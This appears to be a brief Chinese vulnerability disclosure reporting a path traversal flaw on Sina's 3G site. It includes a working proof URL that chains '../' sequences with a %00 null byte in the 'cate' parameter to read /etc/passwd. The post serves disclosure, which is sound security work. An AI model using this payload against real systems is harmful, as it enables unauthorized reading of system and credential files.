新浪3G网站路径遍历 作者:hack1990 时间:11-11-28 阅读数:524人阅读 简要描述:对提交的变量没有作安全过滤和可读取文件目录作严格的控制,导致可以读取系统上任意文件,因为是php架构,可能同时导致其它严重问题。详细说明:漏洞证明:http://3g.sina.com.cn/prog/wapsite/books/subtop.php?vt=&cate=/../../../../../../../../../../../../../../../../../etc/passwd%00 # Nmap Security Scanner 7.0 上一篇:优酷网CSRF致无限制顶或踩一个视频 下一篇:zhient 智睿企业多语版CMS通杀漏洞
